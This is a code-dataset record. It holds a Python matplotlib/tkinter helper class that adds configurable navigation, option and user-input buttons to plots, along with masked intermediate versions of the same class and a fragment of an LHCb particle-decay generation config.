"step-4": "from Configurables import Generation\nGeneration().EventType = 16303437\nGeneration().SampleGenerationTool = 'SignalRepeatedHadronization'\nfrom Configurables import SignalRepeatedHadronization\nGeneration().addTool(SignalRepeatedHadronization)\nGeneration().SignalRepeatedHadronization.ProductionTool = 'PythiaProduction'\nfrom Configurables import ToolSvc\nfrom Configurables import EvtGenDecay\nToolSvc().addTool(EvtGenDecay)\nToolSvc().EvtGenDecay.UserDecayFile = (\n '$DECFILESROOT/dkfiles/Omegab_rho-h-p+,pi-pi0_PPChange=phsp,DecProdCut.dec'\n )\nGeneration().SignalRepeatedHadronization.CutTool = 'DaughtersInLHCb'\nGeneration().SignalRepeatedHadronization.SignalPIDList = [5132, -5132]\nfrom Configurables import LHCb__ParticlePropertySvc\nLHCb__ParticlePropertySvc().Particles = [\n 'Xi_b- 122 5132 -1.0 6.048 1.13e-012 Xi_b- 5132 0.000000e+000',\n 'Xi_b~+ 123 -5132 1.0 6.071 1.1e-012 anti-Xi_b+ -5132 0.000000e+000']\n",
"step-5": "# file /home/hep/ss4314/cmtuser/Gauss_v45r10p1/Gen/DecFiles/options/16303437.py generated: Wed, 25 Jan 2017 15:25:22\n#\n# Event Type: 16303437\n#\n# ASCII decay Descriptor: [Xi_b- -> (rho- -> pi- pi0) K- p+]cc\n#\nfrom Configurables import Generation\nGeneration().EventType = 16303437\nGeneration().SampleGenerationTool = \"SignalRepeatedHadronization\"\nfrom Configurables import SignalRepeatedHadronization\nGeneration().addTool( SignalRepeatedHadronization )\nGeneration().SignalRepeatedHadronization.ProductionTool = \"PythiaProduction\"\nfrom Configurables import ToolSvc\nfrom Configurables import EvtGenDecay\nToolSvc().addTool( EvtGenDecay )\nToolSvc().EvtGenDecay.UserDecayFile = \"$DECFILESROOT/dkfiles/Omegab_rho-h-p+,pi-pi0_PPChange=phsp,DecProdCut.dec\"\nGeneration().SignalRepeatedHadronization.CutTool = \"DaughtersInLHCb\"\nGeneration().SignalRepeatedHadronization.SignalPIDList = [ 5132,-5132 ]\nfrom Configurables import LHCb__ParticlePropertySvc\nLHCb__ParticlePropertySvc().Particles = [ \"Xi_b- 122 5132 -1.0 6.048 1.13e-012 Xi_b- 5132 0.000000e+000\", \"Xi_b~+ 123 -5132 1.0 6.071 1.1e-012 anti-Xi_b+ -5132 0.000000e+000\" ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on 17/02/17 at 11:48 PM
@author: neil
Program description here
Version 0.0.1
"""
import matplotlib.pyplot as plt
from matplotlib.widgets import Button
import sys
# detect python version
# if python 3 do this:
if (sys.version_info > (3, 0)):
import tkinter
import tkinter.simpledialog as tksimpledialog
else:
import Tkinter as tkinter
import tkSimpleDialog as tksimpledialog
# =============================================================================
# Define Class. Methods and Functions
# =============================================================================
class Add_Buttons(object):
def __init__(self, ax=None, **kwargs):
"""
        Adds a configurable row of buttons to the bottom of a matplotlib
        figure (e.g. next, previous, close, option and user-input buttons)
        :param ax: matplotlib axis, the frame to add the buttons to
        :param kwargs: kwargs controlling the buttons
Current allowed kwargs are:
button_labels - list of strings
defines the name of each button to be displayed
Must be of length 1 or greater
button_actions - list of strings
defines the action of each button. Must be same
length as button_labels
currently supported actions are:
"NEXT" - sends a return statement to move to
next plot
self.result set to 1
"PREVIOUS" - sends a return statement to move to
previous plot
self.result set to -1
"CLOSE" - closes the plot
"OPTION" - sends the button_label string
self.result set to button_label
"UINPUT" - asks user for an input
button_params - list of dictionaries (optional)
if defined must be same length as button_labels
a dictionary for each button
keywords of each dictionary:
"close" - when used with "OPTION" action will
close the plot after OPTION is clicked
"""
# set supported actions (and link to function)
self.actions = dict(NEXT=self.next,
PREVIOUS=self.previous,
CLOSE=self.end,
OPTION=self.option,
UINPUT=self.uinput)
self.supported_actions = list(self.actions.keys())
# current button params
self.buttons = []
self.regions = []
# result (1, 0, -1, or string)
self.result = 0
# storage
self.data = dict()
# Deal with having no matplotlib axis
if ax is None:
self.ax = plt.gca()
else:
self.ax = ax
# load keyword arguments
if kwargs is None:
kwargs = dict()
self.button_labels = kwargs.get('button_labels', ['Close'])
self.num_buttons = len(self.button_labels)
self.button_actions = kwargs.get('button_actions', ['CLOSE'])
        dparams = [dict() for _ in range(self.num_buttons)]  # separate dicts, not N refs to one
self.button_params = kwargs.get('button_params', dparams)
# check inputs are correct
self.validate_inputs()
# create buttons
self.create_buttons()
def validate_inputs(self):
# Make sure button labels is in correct format
try:
self.button_labels = list(self.button_labels)
for it in self.button_labels:
if type(it) != str:
raise TypeError()
except TypeError:
raise TypeError("Button labels must be a list of strings")
        # Make sure button actions is in correct format
        try:
            self.button_actions = list(self.button_actions)
            for it in self.button_actions:
                if type(it) != str:
                    raise TypeError()
        except TypeError:
            raise TypeError("Button actions must be a list of strings")
        # Make sure button params is in correct format
        try:
            self.button_params = list(self.button_params)
            for it in self.button_params:
                if type(it) != dict:
                    raise TypeError()
        except TypeError:
            raise TypeError("Button params must be a list of dictionaries")
# Make sure list are not empty and same length
if len(self.button_labels) < 1:
raise ValueError("'button_labels' Must have at least one button "
"label in list.")
if len(self.button_actions) != len(self.button_labels):
raise ValueError("'button_actions' must be the same length "
"as 'button_labels")
self.num_buttons = len(self.button_labels)
# Make sure all button actions are supported
sstr = self.supported_actions[0]
for it in range(len(self.supported_actions)):
if it > 0:
sstr += ', {0}'.format(self.supported_actions[it])
for it in range(len(self.button_actions)):
e1 = "Action '{0}' not currently".format(self.button_actions[it])
e2 = "supported. \n Currently supported actions are: \n"
if self.button_actions[it] not in self.supported_actions:
raise ValueError(e1 + e2 + sstr)
def create_buttons(self, width=0.2):
"""
Create a set of buttons along the bottom axis of the figure
        Note: may need re-writing to be fully generic based on user input
        (might not be possible, as the user needs to define the events)
        :param width: float, width of each button in x, must be less than
                      1.0/self.num_buttons
:return:
"""
b_N, b_length = self.num_buttons, width
b_sep = (1. / (b_N + 1)) * (1 - b_N * b_length)
for b in range(b_N):
start = (b + 1) * b_sep + b * b_length
r = [start, 0.05, b_length, 0.075]
self.regions.append(r)
# adjust the figure
plt.subplots_adjust(bottom=0.25)
# populate buttons
for b in range(b_N):
axbutton = plt.axes(self.regions[b])
button = Button(axbutton, self.button_labels[b])
button.on_clicked(self.actions[self.button_actions[b]])
self.buttons.append(button)
def next(self, event):
"""
Event for clicking a button with action "NEXT"
Sets self.result to 1
:param event:
:return:
"""
self.result = 1
def previous(self, event):
"""
Event for clicking a button with action "PREVIOUS"
Sets self.result to -1
:param event:
:return:
"""
self.result = -1
def option(self, event):
"""
Event for clicking a button with action "OPTION"
Sets self.result to button_label[i] where i is the position in
button_label and button_action of the button clicked
:param event:
:return:
"""
pos = self.button_region(event)
if pos is not None:
self.result = self.button_labels[pos]
close = self.button_params[pos].get('close', False)
func = self.button_params[pos].get('func', None)
if func is not None:
func()
if close:
plt.close()
def uinput(self, event):
pos = self.button_region(event)
if pos is not None:
props = self.button_params[pos]
title = props.get('title', 'Enter a Value')
startvalue = props.get('comment', 'Message')
name = props.get('name', 'x')
fmt = props.get('fmt', None)
minval = props.get('minval', None)
maxval = props.get('maxval', None)
root = tkinter.Tk()
root.withdraw()
if fmt == int:
value = tksimpledialog.askinteger(title, startvalue,
minvalue=minval,
maxvalue=maxval)
elif fmt == float:
value = tksimpledialog.askfloat(title, startvalue,
minvalue=minval,
maxvalue=maxval)
else:
value = tksimpledialog.askstring(title, startvalue)
self.data[name] = value
root.destroy()
def end(self, event):
"""
Event for clicking the finish button - closes the graph
:param event: event passed to function
:return:
"""
plt.close()
def button_region(self, event):
if len(self.regions) == 0:
return None
# get mouse click location in pixels
x, y = event.x, event.y
# get the current canvas width and height (in pixels)
width = event.canvas.geometry().width()
height = event.canvas.geometry().height()
# loop round each button region
for r, rn in enumerate(self.regions):
# convert region to pixels
rn1 = [rn[0]*width, rn[1]*height,
(rn[0] + rn[2])*width, (rn[1] + rn[3])*height]
# test whether x, y are in region
cond1 = (x > rn1[0]) & (x < rn1[2])
cond2 = (y > rn1[1]) & (y < rn1[3])
if cond1 and cond2:
return r
return None
# =============================================================================
# Start of code
# =============================================================================
# Main code to test the button widget
if __name__ == '__main__':
import numpy as np
# plt.close()
# fig, frame = plt.subplots(ncols=1, nrows=1)
# x = np.random.rand(100)
# y = np.random.rand(100)
# plt.scatter(x, y, color='k', marker='o', s=20)
# odict = dict(close=True)
# a = Add_Buttons(ax=frame,
# button_labels=['A', 'B'],
# button_actions=['OPTION', 'OPTION'],
# button_params=[odict, odict])
# plt.show()
# plt.close()
plt.close()
fig, frame = plt.subplots(ncols=1, nrows=1)
x = np.random.rand(100)
y = np.random.rand(100)
plt.scatter(x, y, color='k', marker='o', s=20)
odict = dict(close=True)
udict = dict(name='x', fmt=int, title='Enter value',
comment='Please enter x in meters.', minval=4, maxval=10)
a = Add_Buttons(ax=frame,
button_labels=['Enter value', 'Close'],
button_actions=['UINPUT', 'OPTION'],
button_params=[udict, odict])
plt.show()
plt.close()
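    # Illustrative only, not in the original demo: after the window closes,
    # anything entered through the 'Enter value' UINPUT dialog sits in a.data
    # under the 'name' key from udict ('x' here), and a.result holds the label
    # of the last OPTION button clicked (assuming the user clicked anything).
    print('UINPUT value:', a.data.get('x'), '| last option:', a.result)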
# =============================================================================
# End of code
# =============================================================================
|
normal
|
{
"blob_id": "1576693264a334153c2752ab6b3b4b65daa7c37c",
"index": 8928,
"step-1": "<mask token>\n\n\nclass Add_Buttons(object):\n <mask token>\n\n def validate_inputs(self):\n try:\n self.button_labels = list(self.button_labels)\n for it in self.button_labels:\n if type(it) != str:\n raise TypeError()\n except TypeError:\n raise TypeError('Button labels must be a list of strings')\n try:\n self.button_actions = list(self.button_actions)\n for it in self.button_labels:\n if type(it) != str:\n raise TypeError()\n except TypeError:\n raise TypeError('Button labels must be a list of strings')\n try:\n self.button_actions = list(self.button_actions)\n for it in self.button_params:\n if type(it) != dict:\n raise TypeError()\n except TypeError:\n raise TypeError('Button params must be a dictionary')\n if len(self.button_labels) < 1:\n raise ValueError(\n \"'button_labels' Must have at least one button label in list.\")\n if len(self.button_actions) != len(self.button_labels):\n raise ValueError(\n \"'button_actions' must be the same length as 'button_labels\")\n self.num_buttons = len(self.button_labels)\n sstr = self.supported_actions[0]\n for it in range(len(self.supported_actions)):\n if it > 0:\n sstr += ', {0}'.format(self.supported_actions[it])\n for it in range(len(self.button_actions)):\n e1 = \"Action '{0}' not currently\".format(self.button_actions[it])\n e2 = 'supported. \\n Currently supported actions are: \\n'\n if self.button_actions[it] not in self.supported_actions:\n raise ValueError(e1 + e2 + sstr)\n <mask token>\n <mask token>\n\n def previous(self, event):\n \"\"\"\n Event for clicking a button with action \"PREVIOUS\"\n\n Sets self.result to -1\n\n :param event: \n :return: \n \"\"\"\n self.result = -1\n\n def option(self, event):\n \"\"\"\n Event for clicking a button with action \"OPTION\"\n\n Sets self.result to button_label[i] where i is the position in\n button_label and button_action of the button clicked\n\n :param event: \n :return: \n \"\"\"\n pos = self.button_region(event)\n if pos is not None:\n self.result = self.button_labels[pos]\n close = self.button_params[pos].get('close', False)\n func = self.button_params[pos].get('func', None)\n if func is not None:\n func()\n if close:\n plt.close()\n\n def uinput(self, event):\n pos = self.button_region(event)\n if pos is not None:\n props = self.button_params[pos]\n title = props.get('title', 'Enter a Value')\n startvalue = props.get('comment', 'Message')\n name = props.get('name', 'x')\n fmt = props.get('fmt', None)\n minval = props.get('minval', None)\n maxval = props.get('maxval', None)\n root = tkinter.Tk()\n root.withdraw()\n if fmt == int:\n value = tksimpledialog.askinteger(title, startvalue,\n minvalue=minval, maxvalue=maxval)\n elif fmt == float:\n value = tksimpledialog.askfloat(title, startvalue, minvalue\n =minval, maxvalue=maxval)\n else:\n value = tksimpledialog.askstring(title, startvalue)\n self.data[name] = value\n root.destroy()\n <mask token>\n\n def button_region(self, event):\n if len(self.regions) == 0:\n return None\n x, y = event.x, event.y\n width = event.canvas.geometry().width()\n height = event.canvas.geometry().height()\n for r, rn in enumerate(self.regions):\n rn1 = [rn[0] * width, rn[1] * height, (rn[0] + rn[2]) * width, \n (rn[1] + rn[3]) * height]\n cond1 = (x > rn1[0]) & (x < rn1[2])\n cond2 = (y > rn1[1]) & (y < rn1[3])\n if cond1 and cond2:\n return r\n return None\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Add_Buttons(object):\n\n def __init__(self, ax=None, **kwargs):\n \"\"\"\n Adds a select rectangle feature to any matplotlib axis, with select,\n clear all, and finish buttons\n\n :param ax: matplotlib axis, the frame to add the selector to\n :param kwargs: kwargs passed to the rectangle selector\n\n Current allowed kwargs are:\n\n button_labels - list of strings\n defines the name of each button to be displayed\n Must be of length 1 or greater\n \n button_actions - list of strings\n defines the action of each button. Must be same\n length as button_labels\n\n currently supported actions are:\n \n \"NEXT\" - sends a return statement to move to\n next plot \n self.result set to 1\n \n \"PREVIOUS\" - sends a return statement to move to\n previous plot\n self.result set to -1\n \n \"CLOSE\" - closes the plot\n \n \"OPTION\" - sends the button_label string\n self.result set to button_label\n \n \"UINPUT\" - asks user for an input\n\n button_params - list of dictionaries (optional)\n if defined must be same length as button_labels\n \n a dictionary for each button\n \n keywords of each dictionary:\n \n \"close\" - when used with \"OPTION\" action will\n close the plot after OPTION is clicked\n\n \"\"\"\n self.actions = dict(NEXT=self.next, PREVIOUS=self.previous, CLOSE=\n self.end, OPTION=self.option, UINPUT=self.uinput)\n self.supported_actions = list(self.actions.keys())\n self.buttons = []\n self.regions = []\n self.result = 0\n self.data = dict()\n if ax is None:\n self.ax = plt.gca()\n else:\n self.ax = ax\n if kwargs is None:\n kwargs = dict()\n self.button_labels = kwargs.get('button_labels', ['Close'])\n self.num_buttons = len(self.button_labels)\n self.button_actions = kwargs.get('button_actions', ['CLOSE'])\n dparams = [dict()] * self.num_buttons\n self.button_params = kwargs.get('button_params', dparams)\n self.validate_inputs()\n self.create_buttons()\n\n def validate_inputs(self):\n try:\n self.button_labels = list(self.button_labels)\n for it in self.button_labels:\n if type(it) != str:\n raise TypeError()\n except TypeError:\n raise TypeError('Button labels must be a list of strings')\n try:\n self.button_actions = list(self.button_actions)\n for it in self.button_labels:\n if type(it) != str:\n raise TypeError()\n except TypeError:\n raise TypeError('Button labels must be a list of strings')\n try:\n self.button_actions = list(self.button_actions)\n for it in self.button_params:\n if type(it) != dict:\n raise TypeError()\n except TypeError:\n raise TypeError('Button params must be a dictionary')\n if len(self.button_labels) < 1:\n raise ValueError(\n \"'button_labels' Must have at least one button label in list.\")\n if len(self.button_actions) != len(self.button_labels):\n raise ValueError(\n \"'button_actions' must be the same length as 'button_labels\")\n self.num_buttons = len(self.button_labels)\n sstr = self.supported_actions[0]\n for it in range(len(self.supported_actions)):\n if it > 0:\n sstr += ', {0}'.format(self.supported_actions[it])\n for it in range(len(self.button_actions)):\n e1 = \"Action '{0}' not currently\".format(self.button_actions[it])\n e2 = 'supported. 
\\n Currently supported actions are: \\n'\n if self.button_actions[it] not in self.supported_actions:\n raise ValueError(e1 + e2 + sstr)\n <mask token>\n <mask token>\n\n def previous(self, event):\n \"\"\"\n Event for clicking a button with action \"PREVIOUS\"\n\n Sets self.result to -1\n\n :param event: \n :return: \n \"\"\"\n self.result = -1\n\n def option(self, event):\n \"\"\"\n Event for clicking a button with action \"OPTION\"\n\n Sets self.result to button_label[i] where i is the position in\n button_label and button_action of the button clicked\n\n :param event: \n :return: \n \"\"\"\n pos = self.button_region(event)\n if pos is not None:\n self.result = self.button_labels[pos]\n close = self.button_params[pos].get('close', False)\n func = self.button_params[pos].get('func', None)\n if func is not None:\n func()\n if close:\n plt.close()\n\n def uinput(self, event):\n pos = self.button_region(event)\n if pos is not None:\n props = self.button_params[pos]\n title = props.get('title', 'Enter a Value')\n startvalue = props.get('comment', 'Message')\n name = props.get('name', 'x')\n fmt = props.get('fmt', None)\n minval = props.get('minval', None)\n maxval = props.get('maxval', None)\n root = tkinter.Tk()\n root.withdraw()\n if fmt == int:\n value = tksimpledialog.askinteger(title, startvalue,\n minvalue=minval, maxvalue=maxval)\n elif fmt == float:\n value = tksimpledialog.askfloat(title, startvalue, minvalue\n =minval, maxvalue=maxval)\n else:\n value = tksimpledialog.askstring(title, startvalue)\n self.data[name] = value\n root.destroy()\n\n def end(self, event):\n \"\"\"\n Event for clicking the finish button - closes the graph\n\n :param event: event passed to function\n :return:\n \"\"\"\n plt.close()\n\n def button_region(self, event):\n if len(self.regions) == 0:\n return None\n x, y = event.x, event.y\n width = event.canvas.geometry().width()\n height = event.canvas.geometry().height()\n for r, rn in enumerate(self.regions):\n rn1 = [rn[0] * width, rn[1] * height, (rn[0] + rn[2]) * width, \n (rn[1] + rn[3]) * height]\n cond1 = (x > rn1[0]) & (x < rn1[2])\n cond2 = (y > rn1[1]) & (y < rn1[3])\n if cond1 and cond2:\n return r\n return None\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Add_Buttons(object):\n\n def __init__(self, ax=None, **kwargs):\n \"\"\"\n Adds a select rectangle feature to any matplotlib axis, with select,\n clear all, and finish buttons\n\n :param ax: matplotlib axis, the frame to add the selector to\n :param kwargs: kwargs passed to the rectangle selector\n\n Current allowed kwargs are:\n\n button_labels - list of strings\n defines the name of each button to be displayed\n Must be of length 1 or greater\n \n button_actions - list of strings\n defines the action of each button. Must be same\n length as button_labels\n\n currently supported actions are:\n \n \"NEXT\" - sends a return statement to move to\n next plot \n self.result set to 1\n \n \"PREVIOUS\" - sends a return statement to move to\n previous plot\n self.result set to -1\n \n \"CLOSE\" - closes the plot\n \n \"OPTION\" - sends the button_label string\n self.result set to button_label\n \n \"UINPUT\" - asks user for an input\n\n button_params - list of dictionaries (optional)\n if defined must be same length as button_labels\n \n a dictionary for each button\n \n keywords of each dictionary:\n \n \"close\" - when used with \"OPTION\" action will\n close the plot after OPTION is clicked\n\n \"\"\"\n self.actions = dict(NEXT=self.next, PREVIOUS=self.previous, CLOSE=\n self.end, OPTION=self.option, UINPUT=self.uinput)\n self.supported_actions = list(self.actions.keys())\n self.buttons = []\n self.regions = []\n self.result = 0\n self.data = dict()\n if ax is None:\n self.ax = plt.gca()\n else:\n self.ax = ax\n if kwargs is None:\n kwargs = dict()\n self.button_labels = kwargs.get('button_labels', ['Close'])\n self.num_buttons = len(self.button_labels)\n self.button_actions = kwargs.get('button_actions', ['CLOSE'])\n dparams = [dict()] * self.num_buttons\n self.button_params = kwargs.get('button_params', dparams)\n self.validate_inputs()\n self.create_buttons()\n\n def validate_inputs(self):\n try:\n self.button_labels = list(self.button_labels)\n for it in self.button_labels:\n if type(it) != str:\n raise TypeError()\n except TypeError:\n raise TypeError('Button labels must be a list of strings')\n try:\n self.button_actions = list(self.button_actions)\n for it in self.button_labels:\n if type(it) != str:\n raise TypeError()\n except TypeError:\n raise TypeError('Button labels must be a list of strings')\n try:\n self.button_actions = list(self.button_actions)\n for it in self.button_params:\n if type(it) != dict:\n raise TypeError()\n except TypeError:\n raise TypeError('Button params must be a dictionary')\n if len(self.button_labels) < 1:\n raise ValueError(\n \"'button_labels' Must have at least one button label in list.\")\n if len(self.button_actions) != len(self.button_labels):\n raise ValueError(\n \"'button_actions' must be the same length as 'button_labels\")\n self.num_buttons = len(self.button_labels)\n sstr = self.supported_actions[0]\n for it in range(len(self.supported_actions)):\n if it > 0:\n sstr += ', {0}'.format(self.supported_actions[it])\n for it in range(len(self.button_actions)):\n e1 = \"Action '{0}' not currently\".format(self.button_actions[it])\n e2 = 'supported. 
\\n Currently supported actions are: \\n'\n if self.button_actions[it] not in self.supported_actions:\n raise ValueError(e1 + e2 + sstr)\n\n def create_buttons(self, width=0.2):\n \"\"\"\n Create a set of buttons along the bottom axis of the figure\n\n Need to re-write this to be generic based on used input\n (might not be possible as user need to define events)\n\n :param N: int, Number of buttons, default 3\n :param width: float, width of the buttons in x, must be less than\n 1.0/N\n :return:\n \"\"\"\n b_N, b_length = self.num_buttons, width\n b_sep = 1.0 / (b_N + 1) * (1 - b_N * b_length)\n for b in range(b_N):\n start = (b + 1) * b_sep + b * b_length\n r = [start, 0.05, b_length, 0.075]\n self.regions.append(r)\n plt.subplots_adjust(bottom=0.25)\n for b in range(b_N):\n axbutton = plt.axes(self.regions[b])\n button = Button(axbutton, self.button_labels[b])\n button.on_clicked(self.actions[self.button_actions[b]])\n self.buttons.append(button)\n <mask token>\n\n def previous(self, event):\n \"\"\"\n Event for clicking a button with action \"PREVIOUS\"\n\n Sets self.result to -1\n\n :param event: \n :return: \n \"\"\"\n self.result = -1\n\n def option(self, event):\n \"\"\"\n Event for clicking a button with action \"OPTION\"\n\n Sets self.result to button_label[i] where i is the position in\n button_label and button_action of the button clicked\n\n :param event: \n :return: \n \"\"\"\n pos = self.button_region(event)\n if pos is not None:\n self.result = self.button_labels[pos]\n close = self.button_params[pos].get('close', False)\n func = self.button_params[pos].get('func', None)\n if func is not None:\n func()\n if close:\n plt.close()\n\n def uinput(self, event):\n pos = self.button_region(event)\n if pos is not None:\n props = self.button_params[pos]\n title = props.get('title', 'Enter a Value')\n startvalue = props.get('comment', 'Message')\n name = props.get('name', 'x')\n fmt = props.get('fmt', None)\n minval = props.get('minval', None)\n maxval = props.get('maxval', None)\n root = tkinter.Tk()\n root.withdraw()\n if fmt == int:\n value = tksimpledialog.askinteger(title, startvalue,\n minvalue=minval, maxvalue=maxval)\n elif fmt == float:\n value = tksimpledialog.askfloat(title, startvalue, minvalue\n =minval, maxvalue=maxval)\n else:\n value = tksimpledialog.askstring(title, startvalue)\n self.data[name] = value\n root.destroy()\n\n def end(self, event):\n \"\"\"\n Event for clicking the finish button - closes the graph\n\n :param event: event passed to function\n :return:\n \"\"\"\n plt.close()\n\n def button_region(self, event):\n if len(self.regions) == 0:\n return None\n x, y = event.x, event.y\n width = event.canvas.geometry().width()\n height = event.canvas.geometry().height()\n for r, rn in enumerate(self.regions):\n rn1 = [rn[0] * width, rn[1] * height, (rn[0] + rn[2]) * width, \n (rn[1] + rn[3]) * height]\n cond1 = (x > rn1[0]) & (x < rn1[2])\n cond2 = (y > rn1[1]) & (y < rn1[3])\n if cond1 and cond2:\n return r\n return None\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass Add_Buttons(object):\n\n def __init__(self, ax=None, **kwargs):\n \"\"\"\n Adds a select rectangle feature to any matplotlib axis, with select,\n clear all, and finish buttons\n\n :param ax: matplotlib axis, the frame to add the selector to\n :param kwargs: kwargs passed to the rectangle selector\n\n Current allowed kwargs are:\n\n button_labels - list of strings\n defines the name of each button to be displayed\n Must be of length 1 or greater\n \n button_actions - list of strings\n defines the action of each button. Must be same\n length as button_labels\n\n currently supported actions are:\n \n \"NEXT\" - sends a return statement to move to\n next plot \n self.result set to 1\n \n \"PREVIOUS\" - sends a return statement to move to\n previous plot\n self.result set to -1\n \n \"CLOSE\" - closes the plot\n \n \"OPTION\" - sends the button_label string\n self.result set to button_label\n \n \"UINPUT\" - asks user for an input\n\n button_params - list of dictionaries (optional)\n if defined must be same length as button_labels\n \n a dictionary for each button\n \n keywords of each dictionary:\n \n \"close\" - when used with \"OPTION\" action will\n close the plot after OPTION is clicked\n\n \"\"\"\n self.actions = dict(NEXT=self.next, PREVIOUS=self.previous, CLOSE=\n self.end, OPTION=self.option, UINPUT=self.uinput)\n self.supported_actions = list(self.actions.keys())\n self.buttons = []\n self.regions = []\n self.result = 0\n self.data = dict()\n if ax is None:\n self.ax = plt.gca()\n else:\n self.ax = ax\n if kwargs is None:\n kwargs = dict()\n self.button_labels = kwargs.get('button_labels', ['Close'])\n self.num_buttons = len(self.button_labels)\n self.button_actions = kwargs.get('button_actions', ['CLOSE'])\n dparams = [dict()] * self.num_buttons\n self.button_params = kwargs.get('button_params', dparams)\n self.validate_inputs()\n self.create_buttons()\n\n def validate_inputs(self):\n try:\n self.button_labels = list(self.button_labels)\n for it in self.button_labels:\n if type(it) != str:\n raise TypeError()\n except TypeError:\n raise TypeError('Button labels must be a list of strings')\n try:\n self.button_actions = list(self.button_actions)\n for it in self.button_labels:\n if type(it) != str:\n raise TypeError()\n except TypeError:\n raise TypeError('Button labels must be a list of strings')\n try:\n self.button_actions = list(self.button_actions)\n for it in self.button_params:\n if type(it) != dict:\n raise TypeError()\n except TypeError:\n raise TypeError('Button params must be a dictionary')\n if len(self.button_labels) < 1:\n raise ValueError(\n \"'button_labels' Must have at least one button label in list.\")\n if len(self.button_actions) != len(self.button_labels):\n raise ValueError(\n \"'button_actions' must be the same length as 'button_labels\")\n self.num_buttons = len(self.button_labels)\n sstr = self.supported_actions[0]\n for it in range(len(self.supported_actions)):\n if it > 0:\n sstr += ', {0}'.format(self.supported_actions[it])\n for it in range(len(self.button_actions)):\n e1 = \"Action '{0}' not currently\".format(self.button_actions[it])\n e2 = 'supported. 
\\n Currently supported actions are: \\n'\n if self.button_actions[it] not in self.supported_actions:\n raise ValueError(e1 + e2 + sstr)\n\n def create_buttons(self, width=0.2):\n \"\"\"\n Create a set of buttons along the bottom axis of the figure\n\n Need to re-write this to be generic based on used input\n (might not be possible as user need to define events)\n\n :param N: int, Number of buttons, default 3\n :param width: float, width of the buttons in x, must be less than\n 1.0/N\n :return:\n \"\"\"\n b_N, b_length = self.num_buttons, width\n b_sep = 1.0 / (b_N + 1) * (1 - b_N * b_length)\n for b in range(b_N):\n start = (b + 1) * b_sep + b * b_length\n r = [start, 0.05, b_length, 0.075]\n self.regions.append(r)\n plt.subplots_adjust(bottom=0.25)\n for b in range(b_N):\n axbutton = plt.axes(self.regions[b])\n button = Button(axbutton, self.button_labels[b])\n button.on_clicked(self.actions[self.button_actions[b]])\n self.buttons.append(button)\n\n def next(self, event):\n \"\"\"\n Event for clicking a button with action \"NEXT\"\n \n Sets self.result to 1\n \n :param event: \n :return: \n \"\"\"\n self.result = 1\n\n def previous(self, event):\n \"\"\"\n Event for clicking a button with action \"PREVIOUS\"\n\n Sets self.result to -1\n\n :param event: \n :return: \n \"\"\"\n self.result = -1\n\n def option(self, event):\n \"\"\"\n Event for clicking a button with action \"OPTION\"\n\n Sets self.result to button_label[i] where i is the position in\n button_label and button_action of the button clicked\n\n :param event: \n :return: \n \"\"\"\n pos = self.button_region(event)\n if pos is not None:\n self.result = self.button_labels[pos]\n close = self.button_params[pos].get('close', False)\n func = self.button_params[pos].get('func', None)\n if func is not None:\n func()\n if close:\n plt.close()\n\n def uinput(self, event):\n pos = self.button_region(event)\n if pos is not None:\n props = self.button_params[pos]\n title = props.get('title', 'Enter a Value')\n startvalue = props.get('comment', 'Message')\n name = props.get('name', 'x')\n fmt = props.get('fmt', None)\n minval = props.get('minval', None)\n maxval = props.get('maxval', None)\n root = tkinter.Tk()\n root.withdraw()\n if fmt == int:\n value = tksimpledialog.askinteger(title, startvalue,\n minvalue=minval, maxvalue=maxval)\n elif fmt == float:\n value = tksimpledialog.askfloat(title, startvalue, minvalue\n =minval, maxvalue=maxval)\n else:\n value = tksimpledialog.askstring(title, startvalue)\n self.data[name] = value\n root.destroy()\n\n def end(self, event):\n \"\"\"\n Event for clicking the finish button - closes the graph\n\n :param event: event passed to function\n :return:\n \"\"\"\n plt.close()\n\n def button_region(self, event):\n if len(self.regions) == 0:\n return None\n x, y = event.x, event.y\n width = event.canvas.geometry().width()\n height = event.canvas.geometry().height()\n for r, rn in enumerate(self.regions):\n rn1 = [rn[0] * width, rn[1] * height, (rn[0] + rn[2]) * width, \n (rn[1] + rn[3]) * height]\n cond1 = (x > rn1[0]) & (x < rn1[2])\n cond2 = (y > rn1[1]) & (y < rn1[3])\n if cond1 and cond2:\n return r\n return None\n\n\n<mask token>\n",
"step-5": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 17/02/17 at 11:48 PM\n\n@author: neil\n\nProgram description here\n\nVersion 0.0.1\n\"\"\"\n\nimport matplotlib.pyplot as plt\nfrom matplotlib.widgets import Button\nimport sys\n# detect python version\n# if python 3 do this:\nif (sys.version_info > (3, 0)):\n import tkinter\n import tkinter.simpledialog as tksimpledialog\nelse:\n import Tkinter as tkinter\n import tkSimpleDialog as tksimpledialog\n\n# =============================================================================\n# Define Class. Methods and Functions\n# =============================================================================\nclass Add_Buttons(object):\n def __init__(self, ax=None, **kwargs):\n \"\"\"\n Adds a select rectangle feature to any matplotlib axis, with select,\n clear all, and finish buttons\n\n :param ax: matplotlib axis, the frame to add the selector to\n :param kwargs: kwargs passed to the rectangle selector\n\n Current allowed kwargs are:\n\n button_labels - list of strings\n defines the name of each button to be displayed\n Must be of length 1 or greater\n \n button_actions - list of strings\n defines the action of each button. Must be same\n length as button_labels\n\n currently supported actions are:\n \n \"NEXT\" - sends a return statement to move to\n next plot \n self.result set to 1\n \n \"PREVIOUS\" - sends a return statement to move to\n previous plot\n self.result set to -1\n \n \"CLOSE\" - closes the plot\n \n \"OPTION\" - sends the button_label string\n self.result set to button_label\n \n \"UINPUT\" - asks user for an input\n\n button_params - list of dictionaries (optional)\n if defined must be same length as button_labels\n \n a dictionary for each button\n \n keywords of each dictionary:\n \n \"close\" - when used with \"OPTION\" action will\n close the plot after OPTION is clicked\n\n \"\"\"\n # set supported actions (and link to function)\n self.actions = dict(NEXT=self.next,\n PREVIOUS=self.previous,\n CLOSE=self.end,\n OPTION=self.option,\n UINPUT=self.uinput)\n self.supported_actions = list(self.actions.keys())\n # current button params\n self.buttons = []\n self.regions = []\n # result (1, 0, -1, or string)\n self.result = 0\n # storage\n self.data = dict()\n # Deal with having no matplotlib axis\n if ax is None:\n self.ax = plt.gca()\n else:\n self.ax = ax\n # load keyword arguments\n if kwargs is None:\n kwargs = dict()\n self.button_labels = 